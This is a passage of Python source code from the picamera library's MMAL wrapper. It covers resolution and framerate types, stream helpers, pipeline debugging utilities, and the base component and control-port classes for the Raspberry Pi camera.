mmal.MMAL_PARAMETER_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_IMAGE_EFFECT: mmal.MMAL_PARAMETER_IMAGEFX_T,
mmal.MMAL_PARAMETER_IMAGE_EFFECT_PARAMETERS: mmal.MMAL_PARAMETER_IMAGEFX_PARAMETERS_T,
mmal.MMAL_PARAMETER_INPUT_CROP: mmal.MMAL_PARAMETER_INPUT_CROP_T,
mmal.MMAL_PARAMETER_INTRAPERIOD: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_ATTACH_LOG: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_JPEG_Q_FACTOR: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_RESTART_INTERVAL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_LOCKSTEP_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_LOGGING: mmal.MMAL_PARAMETER_LOGGING_T,
mmal.MMAL_PARAMETER_MB_ROWS_PER_SLICE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_MEM_USAGE: mmal.MMAL_PARAMETER_MEM_USAGE_T,
mmal.MMAL_PARAMETER_MINIMISE_FRAGMENTATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_MIRROR: mmal.MMAL_PARAMETER_UINT32_T, # actually mmal.MMAL_PARAMETER_MIRROR_T but this just contains a uint32
mmal.MMAL_PARAMETER_NALUNITFORMAT: mmal.MMAL_PARAMETER_VIDEO_NALUNITFORMAT_T,
mmal.MMAL_PARAMETER_NO_IMAGE_PADDING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_POWERMON_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_PRIVACY_INDICATOR: mmal.MMAL_PARAMETER_PRIVACY_INDICATOR_T,
mmal.MMAL_PARAMETER_PROFILE: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_RATECONTROL: mmal.MMAL_PARAMETER_VIDEO_RATECONTROL_T,
mmal.MMAL_PARAMETER_REDEYE: mmal.MMAL_PARAMETER_REDEYE_T,
mmal.MMAL_PARAMETER_ROTATION: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_SATURATION: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SEEK: mmal.MMAL_PARAMETER_SEEK_T,
mmal.MMAL_PARAMETER_SENSOR_INFORMATION: mmal.MMAL_PARAMETER_SENSOR_INFORMATION_T,
mmal.MMAL_PARAMETER_SHARPNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SHUTTER_SPEED: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_STATISTICS: mmal.MMAL_PARAMETER_STATISTICS_T,
mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE: mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE_T,
mmal.MMAL_PARAMETER_STILLS_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS: mmal.MMAL_PARAMETER_ENCODING_T,
mmal.MMAL_PARAMETER_SUPPORTED_PROFILES: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_SW_SATURATION_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SW_SHARPEN_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SYSTEM_TIME: mmal.MMAL_PARAMETER_UINT64_T,
mmal.MMAL_PARAMETER_THUMBNAIL_CONFIGURATION: mmal.MMAL_PARAMETER_THUMBNAIL_CONFIG_T,
mmal.MMAL_PARAMETER_URI: mmal.MMAL_PARAMETER_URI_T,
mmal.MMAL_PARAMETER_USE_STC: mmal.MMAL_PARAMETER_CAMERA_STC_MODE_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_HORIZ: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_VERT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_BIT_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_DROPPABLE_PFRAMES: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE: mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE: mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_FRAME_LIMIT_BITS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INITIAL_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_HEADER: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_VECTORS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MAX_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MIN_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_PEAK_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_QP_P: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL: mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_SLICE_DQUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SEI_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SPS_TIMING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_VIDEO_IMMUTABLE_INPUT: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE: mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE_T,
mmal.MMAL_PARAMETER_VIDEO_INTERPOLATE_TIMESTAMPS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH: mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH_T,
mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION: mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION_T,
mmal.MMAL_PARAMETER_VIDEO_MAX_NUM_CALLBACKS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS: mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS_T,
mmal.MMAL_PARAMETER_VIDEO_REQUEST_I_FRAME: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_STABILISATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_COPY: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_SHUTTER_LAG: mmal.MMAL_PARAMETER_ZEROSHUTTERLAG_T,
mmal.MMAL_PARAMETER_ZOOM: mmal.MMAL_PARAMETER_SCALEFACTOR_T,
}
class PiCameraFraction(Fraction):
    """
    A :class:`~fractions.Fraction` subclass which additionally masquerades as
    a two-element (numerator, denominator) tuple for backwards compatibility
    with older versions of the API.
    """
    def _warn_tuple_access(self):
        # Single shared deprecation notice for the legacy tuple protocol
        warnings.warn(
            PiCameraDeprecated(
                'Accessing framerate as a tuple is deprecated; this value is '
                'now a Fraction, so you can query the numerator and '
                'denominator properties directly, convert to an int or float, '
                'or perform arithmetic operations and comparisons directly'))

    def __len__(self):
        self._warn_tuple_access()
        return 2

    def __getitem__(self, index):
        self._warn_tuple_access()
        if index == 0:
            return self.numerator
        if index == 1:
            return self.denominator
        raise IndexError('invalid index %d' % index)

    def __contains__(self, value):
        # Tuple-style membership: true for either component of the fraction
        return value in (self.numerator, self.denominator)
class PiResolution(namedtuple('PiResolution', ('width', 'height'))):
    """
    A :func:`~collections.namedtuple` derivative which represents a resolution
    with a :attr:`width` and :attr:`height`.

    .. attribute:: width

        The width of the resolution in pixels

    .. attribute:: height

        The height of the resolution in pixels

    .. versionadded:: 1.11
    """
    __slots__ = () # workaround python issue #24931

    def pad(self, width=32, height=16):
        """
        Returns the resolution padded up to the nearest multiple of *width*
        and *height* which default to 32 and 16 respectively (the camera's
        native block size for most operations). For example:

        .. code-block:: pycon

            >>> PiResolution(1920, 1080).pad()
            PiResolution(width=1920, height=1088)
            >>> PiResolution(100, 100).pad(16, 16)
            PiResolution(width=112, height=112)
        """
        # Round each dimension up to the next multiple using integer
        # ceiling-division
        return PiResolution(
            width=((self.width + (width - 1)) // width) * width,
            height=((self.height + (height - 1)) // height) * height,
            )

    def transpose(self):
        """
        Returns the resolution with the width and height transposed. For
        example:

        .. code-block:: pycon

            >>> PiResolution(1920, 1080).transpose()
            PiResolution(width=1080, height=1920)
        """
        return PiResolution(self.height, self.width)

    def __str__(self):
        # Render as the conventional "WIDTHxHEIGHT" string
        return '%dx%d' % (self.width, self.height)
class PiFramerateRange(namedtuple('PiFramerateRange', ('low', 'high'))):
    """
    A :func:`~collections.namedtuple` derivative holding the low and high
    limits of a range of framerates. Prefer accessing the values by attribute
    (for example ``camera.framerate_range.low``) rather than by position
    (``camera.framerate_range[0]``).

    .. attribute:: low

        The lowest framerate that the camera is permitted to use (inclusive).
        When the :attr:`~picamera.PiCamera.framerate_range` attribute is
        queried, this value will always be returned as a
        :class:`~fractions.Fraction`.

    .. attribute:: high

        The highest framerate that the camera is permitted to use (inclusive).
        When the :attr:`~picamera.PiCamera.framerate_range` attribute is
        queried, this value will always be returned as a
        :class:`~fractions.Fraction`.

    .. versionadded:: 1.13
    """
    __slots__ = () # workaround python issue #24931

    def __new__(cls, low, high):
        # Normalize both bounds to Fractions before storing them
        low_frac = to_fraction(low)
        high_frac = to_fraction(high)
        return super(PiFramerateRange, cls).__new__(cls, low_frac, high_frac)

    def __str__(self):
        return '{0}..{1}'.format(self.low, self.high)
class PiSensorMode(namedtuple('PiSensorMode', ('resolution', 'framerates',
                                               'video', 'still', 'full_fov'))):
    """
    A :func:`~collections.namedtuple` derivative describing a camera sensor
    mode.

    .. attribute:: resolution

        A :class:`PiResolution` specifying the size of frames output by the
        camera in this mode.

    .. attribute:: framerates

        A :class:`PiFramerateRange` specifying the minimum and maximum
        framerates supported by this sensor mode. Typically the low value is
        exclusive and high value inclusive.

    .. attribute:: video

        A :class:`bool` indicating whether or not the mode is capable of
        recording video. Currently this is always ``True``.

    .. attribute:: still

        A :class:`bool` indicating whether the mode can be used for still
        captures (cases where a capture method is called with
        ``use_video_port`` set to ``False``).

    .. attribute:: full_fov

        A :class:`bool` indicating whether the full width of the sensor
        area is used to capture frames. This can be ``True`` even when the
        resolution is less than the camera's maximum resolution due to binning
        and skipping. See :ref:`camera_modes` for a diagram of the available
        fields of view.
    """
    __slots__ = () # workaround python issue #24931

    def __new__(cls, resolution, framerates, video=True, still=False,
                full_fov=True):
        # Coerce plain tuples/strings into the rich types so attribute access
        # behaves consistently however the mode was constructed
        if not isinstance(resolution, PiResolution):
            resolution = to_resolution(resolution)
        if not isinstance(framerates, PiFramerateRange):
            framerates = PiFramerateRange(*framerates)
        return super(PiSensorMode, cls).__new__(
            cls, resolution, framerates, video, still, full_fov)
def open_stream(stream, output=True, buffering=65536):
    """
    This is the core of picamera's IO-semantics. It returns a tuple of a
    file-like object and a bool indicating whether the stream requires closing
    once the caller is finished with it.

    * If *stream* is a string, it is opened as a file object (with mode 'wb'
      if *output* is ``True``, and the specified amount of *buffering*). In
      this case the function returns ``(stream, True)``.

    * If *stream* is a stream with a ``write`` method, it is returned as
      ``(stream, False)``.

    * Otherwise *stream* is assumed to be a writeable buffer and is wrapped
      with :class:`BufferIO`. The function returns ``(stream, True)``.
    """
    # Byte-string filenames are decoded to str before being opened
    if isinstance(stream, bytes):
        stream = stream.decode('ascii')
    opened = isinstance(stream, str)
    if opened:
        stream = io.open(stream, 'wb' if output else 'rb', buffering)
    else:
        try:
            # Probe (without calling) for the method the caller will need;
            # an AttributeError means it isn't a usable stream object
            if output:
                stream.write
            else:
                stream.read
        except AttributeError:
            # Assume the stream is actually a buffer
            opened = True
            stream = BufferIO(stream)
            # NOTE(review): assumes BufferIO.writable is a property (or
            # truthy/falsy attribute) rather than an io-style method --
            # confirm against the BufferIO definition
            if output and not stream.writable:
                raise IOError('writeable buffer required for output')
    return (stream, opened)
def close_stream(stream, opened):
    """
    Finalize *stream* as produced by :func:`open_stream`. When *opened* is
    ``True`` the stream's ``close`` method is called; otherwise a best-effort
    ``flush`` is attempted (objects without a ``flush`` method are left
    untouched).
    """
    if opened:
        stream.close()
        return
    try:
        stream.flush()
    except AttributeError:
        # Best effort only: not every stream-like object implements flush()
        pass
def to_resolution(value):
    """
    Converts *value* to a :class:`PiResolution`. *value* may already be a
    (width, height) pair, or a string such as ``"1024x768"``, or one of a
    handful of well-known display-standard names (``"VGA"``, ``"1080p"``,
    and so on).
    """
    if isinstance(value, bytes):
        value = value.decode('utf-8')
    if not isinstance(value, str):
        # Non-string: must be an unpackable (width, height) pair
        try:
            w, h = value
        except (TypeError, ValueError):
            raise PiCameraValueError("Invalid resolution tuple: %r" % value)
        return PiResolution(w, h)
    # A selection from https://en.wikipedia.org/wiki/Graphics_display_resolution
    # Feel free to suggest additions
    named_modes = {
        'VGA': (640, 480),
        'SVGA': (800, 600),
        'XGA': (1024, 768),
        'SXGA': (1280, 1024),
        'UXGA': (1600, 1200),
        'HD': (1280, 720),
        'FHD': (1920, 1080),
        '1080P': (1920, 1080),
        '720P': (1280, 720),
        }
    key = value.strip().upper()
    if key in named_modes:
        w, h = named_modes[key]
    else:
        # Fall back to parsing a "WIDTHxHEIGHT" string
        w, h = (int(part.strip()) for part in value.upper().split('X', 1))
    return PiResolution(w, h)
def to_fraction(value, den_limit=65536):
    """
    Converts *value*, which can be any numeric type, an MMAL_RATIONAL_T, or a
    (numerator, denominator) tuple to a :class:`~fractions.Fraction` limiting
    the denominator to the range 0 < n <= *den_limit* (which defaults to
    65536).
    """
    # The nested fallbacks below probe progressively for the different
    # numerator/denominator spellings used by the accepted types; the order
    # matters (e.g. Fraction exposes numerator/denominator, floats expose
    # as_integer_ratio, MMAL rationals expose num/den)
    try:
        # int, long, or fraction
        n, d = value.numerator, value.denominator
    except AttributeError:
        try:
            # float
            n, d = value.as_integer_ratio()
        except AttributeError:
            try:
                # MMAL_RATIONAL_T structure fields
                n, d = value.num, value.den
            except AttributeError:
                try:
                    # tuple
                    # NOTE(review): a 2-character string would also unpack
                    # here (as two characters) -- presumably callers never
                    # pass strings of that form; verify
                    n, d = value
                    warnings.warn(
                        PiCameraDeprecated(
                            "Setting framerate or gains as a tuple is "
                            "deprecated; please use one of Python's many "
                            "numeric classes like int, float, Decimal, or "
                            "Fraction instead"))
                except (TypeError, ValueError):
                    # try and convert anything else to a Fraction directly
                    value = Fraction(value)
                    n, d = value.numerator, value.denominator
    # Ensure denominator is reasonable
    if d == 0:
        raise PiCameraValueError("Denominator cannot be 0")
    elif d > den_limit:
        # Approximate with the closest fraction whose denominator fits
        return Fraction(n, d).limit_denominator(den_limit)
    else:
        return Fraction(n, d)
def to_rational(value):
    """
    Converts *value* (anything accepted by :func:`to_fraction`) into an
    MMAL_RATIONAL_T structure.
    """
    frac = to_fraction(value)
    return mmal.MMAL_RATIONAL_T(frac.numerator, frac.denominator)
def buffer_bytes(buf):
    """
    Returns the size in bytes of *buf*, an object implementing the
    :ref:`buffer protocol <bufferobjects>`. Handles multi-dimensional
    buffers and buffers whose items are larger than a single byte.
    """
    # Normalize to a memoryview so shape/itemsize are available, then
    # multiply the item size by the product of all dimensions
    mv = buf if isinstance(buf, memoryview) else memoryview(buf)
    return mv.itemsize * reduce(mul, mv.shape)
def debug_pipeline(port):
    """
    Given an :class:`MMALVideoPort` *port*, this traces all objects in the
    pipeline feeding it (including components and connections) and yields each
    object in turn. Hence the generator typically yields something like:

    * :class:`MMALVideoPort` (the specified output port)
    * :class:`MMALEncoder` (the encoder which owns the output port)
    * :class:`MMALVideoPort` (the encoder's input port)
    * :class:`MMALConnection` (the connection between the splitter and encoder)
    * :class:`MMALVideoPort` (the splitter's output port)
    * :class:`MMALSplitter` (the splitter on the camera's video port)
    * :class:`MMALVideoPort` (the splitter's input port)
    * :class:`MMALConnection` (the connection between the splitter and camera)
    * :class:`MMALVideoPort` (the camera's video port)
    * :class:`MMALCamera` (the camera component)
    """
    def find_port(addr):
        # Resolve a raw MMAL_PORT_T address back to its Python wrapper by
        # scanning the registry of live MMAL objects
        for obj in MMALObject.REGISTRY:
            if isinstance(obj, MMALControlPort):
                if ct.addressof(obj._port[0]) == addr:
                    return obj
        raise IndexError('unable to locate port with address %x' % addr)

    def find_component(addr):
        # Resolve a raw MMAL_COMPONENT_T address back to its Python wrapper
        for obj in MMALObject.REGISTRY:
            if isinstance(obj, MMALBaseComponent) and obj._component is not None:
                if ct.addressof(obj._component[0]) == addr:
                    return obj
        raise IndexError('unable to locate component with address %x' % addr)

    assert isinstance(port, (MMALControlPort, MMALPythonPort))
    # Walk upstream: from the given output port to its owning component,
    # then across that component's input connection to the next output port,
    # stopping at a component with no upstream connection
    while True:
        if port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
            yield port
        if isinstance(port, MMALPythonPort):
            # _owner() presumably dereferences a weakref to the owning
            # Python component -- confirm against MMALPythonPort
            comp = port._owner()
        else:
            comp = find_component(ct.addressof(port._port[0].component[0]))
        yield comp
        if not isinstance(comp, (MMALComponent, MMALPythonComponent)):
            break
        if comp.connection is None:
            break
        if isinstance(comp.connection, MMALPythonConnection):
            port = comp.connection._target
        else:
            port = find_port(ct.addressof(comp.connection._connection[0].in_[0]))
        yield port
        yield comp.connection
        if isinstance(comp.connection, MMALPythonConnection):
            port = comp.connection._source
        else:
            port = find_port(ct.addressof(comp.connection._connection[0].out[0]))
def print_pipeline(port):
    """
    Prints a human readable representation of the pipeline feeding the
    specified :class:`MMALVideoPort` *port*.
    """
    # Six display rows: name, encoding, buffers, bitrate, frame geometry,
    # and colorspace
    rows = [[], [], [], [], [], []]
    # under_comp is True immediately after a component cell has been added;
    # the first port following a component also emits the row-label cells
    under_comp = False
    for obj in reversed(list(debug_pipeline(port))):
        if isinstance(obj, (MMALBaseComponent, MMALPythonBaseComponent)):
            rows[0].append(obj.name)
            under_comp = True
        elif isinstance(obj, MMALVideoPort):
            rows[0].append('[%d]' % obj._port[0].index)
            if under_comp:
                rows[1].append('encoding')
            if obj.format == mmal.MMAL_ENCODING_OPAQUE:
                rows[1].append(obj.opaque_subformat)
            else:
                rows[1].append(mmal.FOURCC_str(obj._port[0].format[0].encoding))
            if under_comp:
                rows[2].append('buf')
            rows[2].append('%dx%d' % (obj._port[0].buffer_num, obj._port[0].buffer_size))
            if under_comp:
                rows[3].append('bitrate')
            rows[3].append('%dbps' % (obj._port[0].format[0].bitrate,))
            if under_comp:
                rows[4].append('frame')
            rows[4].append('%dx%d@%sfps' % (
                obj._port[0].format[0].es[0].video.width,
                obj._port[0].format[0].es[0].video.height,
                obj.framerate))
            if under_comp:
                rows[5].append('colorspc')
                under_comp = False
            rows[5].append(mmal.FOURCC_str(obj._port[0].format[0].es[0].video.color_space))
        elif isinstance(obj, MMALPythonPort):
            # Python-implemented ports read format info from _format rather
            # than the MMAL port structure; no colorspace is reported
            rows[0].append('[%d]' % obj._index)
            if under_comp:
                rows[1].append('encoding')
            if obj.format == mmal.MMAL_ENCODING_OPAQUE:
                rows[1].append(obj.opaque_subformat)
            else:
                rows[1].append(mmal.FOURCC_str(obj._format[0].encoding))
            if under_comp:
                rows[2].append('buf')
            rows[2].append('%dx%d' % (obj.buffer_count, obj.buffer_size))
            if under_comp:
                rows[3].append('bitrate')
            rows[3].append('%dbps' % (obj._format[0].bitrate,))
            if under_comp:
                rows[4].append('frame')
                under_comp = False
            rows[4].append('%dx%d@%sfps' % (
                obj._format[0].es[0].video.width,
                obj._format[0].es[0].video.height,
                obj.framerate))
            if under_comp:
                rows[5].append('colorspc')
            rows[5].append('???')
        elif isinstance(obj, (MMALConnection, MMALPythonConnection)):
            # Connections render as a simple arrow between port columns
            rows[0].append('')
            rows[1].append('')
            rows[2].append('-->')
            rows[3].append('')
            rows[4].append('')
            rows[5].append('')
    if under_comp:
        # The pipeline ended immediately after a component; emit the row
        # labels that a following port would otherwise have added
        rows[1].append('encoding')
        rows[2].append('buf')
        rows[3].append('bitrate')
        rows[4].append('frame')
        rows[5].append('colorspc')
    # Transpose to columns to compute per-column widths, then format each
    # row with a repeating alignment pattern (centre, left, centre, right)
    cols = list(zip(*rows))
    max_lens = [max(len(s) for s in col) + 2 for col in cols]
    rows = [
        ''.join('{0:{align}{width}s}'.format(s, align=align, width=max_len)
                for s, max_len, align in zip(row, max_lens, cycle('^<^>')))
        for row in rows
        ]
    for row in rows:
        print(row)
class MMALObject(object):
    """
    Abstract base for wrappers around MMAL entities (components, ports,
    connections, and so on). Every instance is tracked, via weak reference,
    in :attr:`REGISTRY`, which therefore enumerates all MMAL objects
    currently alive and permits object lookup without extending any object's
    lifetime.
    """
    __slots__ = ('__weakref__',)
    # Weakly references every live MMAL wrapper; entries disappear when the
    # corresponding object is garbage collected
    REGISTRY = weakref.WeakSet()

    def __init__(self):
        super(MMALObject, self).__init__()
        MMALObject.REGISTRY.add(self)
class MMALBaseComponent(MMALObject):
    """
    Represents a generic MMAL component. Class attributes are read to determine
    the component type, and the OPAQUE sub-formats of each connectable port.
    """
    __slots__ = ('_component', '_control', '_inputs', '_outputs')
    # Name passed to mmal_component_create; subclasses override this
    component_type = b'none'
    # OPAQUE sub-format for each input/output port; the lengths of these
    # tuples also define how many ports the component is expected to have
    opaque_input_subformats = ()
    opaque_output_subformats = ()

    def __init__(self):
        super(MMALBaseComponent, self).__init__()
        # Create the underlying MMAL component; _component is a ctypes
        # pointer to the MMAL_COMPONENT_T structure
        self._component = ct.POINTER(mmal.MMAL_COMPONENT_T)()
        mmal_check(
            mmal.mmal_component_create(self.component_type, self._component),
            prefix="Failed to create MMAL component %s" % self.component_type)
        # Verify the firmware reports the same number of ports as the class
        # declared via the opaque_*_subformats tuples
        if self._component[0].input_num != len(self.opaque_input_subformats):
            raise PiCameraRuntimeError(
                'Expected %d inputs but found %d on component %s' % (
                    len(self.opaque_input_subformats),
                    self._component[0].input_num,
                    self.component_type))
        if self._component[0].output_num != len(self.opaque_output_subformats):
            raise PiCameraRuntimeError(
                'Expected %d outputs but found %d on component %s' % (
                    len(self.opaque_output_subformats),
                    self._component[0].output_num,
                    self.component_type))
        self._control = MMALControlPort(self._component[0].control)
        # Choose the port wrapper class according to the elementary stream
        # type reported in each port's format
        port_class = {
            mmal.MMAL_ES_TYPE_UNKNOWN: MMALPort,
            mmal.MMAL_ES_TYPE_CONTROL: MMALControlPort,
            mmal.MMAL_ES_TYPE_VIDEO: MMALVideoPort,
            mmal.MMAL_ES_TYPE_AUDIO: MMALAudioPort,
            mmal.MMAL_ES_TYPE_SUBPICTURE: MMALSubPicturePort,
            }
        self._inputs = tuple(
            port_class[self._component[0].input[n][0].format[0].type](
                self._component[0].input[n], opaque_subformat)
            for n, opaque_subformat in enumerate(self.opaque_input_subformats))
        self._outputs = tuple(
            port_class[self._component[0].output[n][0].format[0].type](
                self._component[0].output[n], opaque_subformat)
            for n, opaque_subformat in enumerate(self.opaque_output_subformats))

    def close(self):
        """
        Close the component and release all its resources. After this is
        called, most methods will raise exceptions if called.
        """
        if self._component is not None:
            # ensure we free any pools associated with input/output ports
            for output in self.outputs:
                output.disable()
            for input in self.inputs:
                input.disable()
            mmal.mmal_component_destroy(self._component)
            self._component = None
            self._inputs = ()
            self._outputs = ()
            self._control = None

    @property
    def name(self):
        """
        The name of the component, as reported by MMAL.
        """
        return self._component[0].name.decode('ascii')

    @property
    def control(self):
        """
        The :class:`MMALControlPort` control port of the component which can be
        used to configure most aspects of the component's behaviour.
        """
        return self._control

    @property
    def inputs(self):
        """
        A sequence of :class:`MMALPort` objects representing the inputs
        of the component.
        """
        return self._inputs

    @property
    def outputs(self):
        """
        A sequence of :class:`MMALPort` objects representing the outputs
        of the component.
        """
        return self._outputs

    @property
    def enabled(self):
        """
        Returns ``True`` if the component is currently enabled. Use
        :meth:`enable` and :meth:`disable` to control the component's state.
        """
        return bool(self._component[0].is_enabled)

    def enable(self):
        """
        Enable the component. When a component is enabled it will process data
        sent to its input port(s), sending the results to buffers on its output
        port(s). Components may be implicitly enabled by connections.
        """
        mmal_check(
            mmal.mmal_component_enable(self._component),
            prefix="Failed to enable component")

    def disable(self):
        """
        Disables the component.
        """
        mmal_check(
            mmal.mmal_component_disable(self._component),
            prefix="Failed to disable component")

    def __enter__(self):
        # Context manager protocol: close() is invoked on exit
        return self

    def __exit__(self, exc_type, exc_value, exc_tb):
        self.close()

    def __repr__(self):
        if self._component is not None:
            return '<%s "%s": %d inputs %d outputs>' % (
                self.__class__.__name__, self.name,
                len(self.inputs), len(self.outputs))
        else:
            return '<%s closed>' % self.__class__.__name__
class MMALControlPort(MMALObject):
    """
    Represents an MMAL port with properties to configure the port's parameters.
    """
    __slots__ = ('_port', '_params', '_wrapper')

    def __init__(self, port):
        super(MMALControlPort, self).__init__()
        # port is a ctypes pointer to the underlying MMAL_PORT_T
        self._port = port
        self._params = MMALPortParams(port)
        # Holds the ctypes callback wrapper so it stays alive while the
        # port is enabled
        self._wrapper = None

    @property
    def index(self):
        """
        Returns an integer indicating the port's position within its owning
        list (inputs, outputs, etc.)
        """
        return self._port[0].index

    @property
    def enabled(self):
        """
        Returns a :class:`bool` indicating whether the port is currently
        enabled. Unlike other classes, this is a read-only property. Use
        :meth:`enable` and :meth:`disable` to modify the value.
        """
        return bool(self._port[0].is_enabled)

    def enable(self, callback=None):
        """
        Enable the port with the specified callback function (this must be
        ``None`` for connected ports, and a callable for disconnected ports).

        The callback function must accept two parameters which will be this
        :class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
        instance. Any return value will be ignored.
        """
        def wrapper(port, buf):
            # Wrap the raw MMAL buffer and guarantee it is released even if
            # the user's callback raises
            buf = MMALBuffer(buf)
            try:
                callback(self, buf)
            finally:
                buf.release()

        # When no callback is given, a NULL C callback is passed instead
        # (the required configuration for connected ports)
        if callback:
            self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
        else:
            self._wrapper = ct.cast(None, mmal.MMAL_PORT_BH_CB_T)
        mmal_check(
            mmal.mmal_port_enable(self._port, self._wrapper),
            prefix="Unable to enable port %s" % self.name)

    def disable(self):
        """
        Disable the port.
        """
        # NOTE: The test here only exists to avoid spamming the console; when
        # disabling an already disabled port MMAL dumps errors to stderr. If
        # this test isn't here closing a camera results in half a dozen lines
        # of ignored errors
        if self.enabled:
            try:
                mmal_check(
                    mmal.mmal_port_disable(self._port),
                    prefix="Unable to disable port %s" % self.name)
            except PiCameraMMALError as e:
                # Ignore the error if we're disabling an already disabled port
                if not (e.status == mmal.MMAL_EINVAL and not self.enabled):
                    raise e
        self._wrapper = None

    @property
    def name(self):
        """
        The name of the port, as reported by MMAL, with any trailing
        "(format)" suffix stripped.
        """
        result = self._port[0].name.decode('ascii')
        if result.endswith(')'):
            try:
                # strip (format) from port names as it doesn't really belong
                # there (it doesn't identify the port in any way) and makes
                # matching some of the correctional cases a pain
                return result[:result.rindex('(')]
            except ValueError:
                return result
        else:
            return result

    @property
    def type(self):
        """
        The type of the port. One of:

        * MMAL_PORT_TYPE_OUTPUT
        * MMAL_PORT_TYPE_INPUT
        * MMAL_PORT_TYPE_CONTROL
        * MMAL_PORT_TYPE_CLOCK
        """
        return self._port[0].type

    @property
    def capabilities(self):
        """
        The capabilities of the port. A bitfield of the following:

        * MMAL_PORT_CAPABILITY_PASSTHROUGH
        * MMAL_PORT_CAPABILITY_ALLOCATION
        * MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
        """
        return self._port[0].capabilities

    @property
    def params(self):
        """
        The configurable parameters for the port. This is presented as a
        mutable mapping of parameter numbers to values, implemented by the
        :class:`MMALPortParams` class.
        """
        return self._params

    def __repr__(self):
        if self._port is not None:
            return '<MMALControlPort "%s">' % self.name
        else:
            return '<MMALControlPort closed>'
class MMALPort(MMALControlPort):
"""
Represents an MMAL port with properties to configure and update the port's
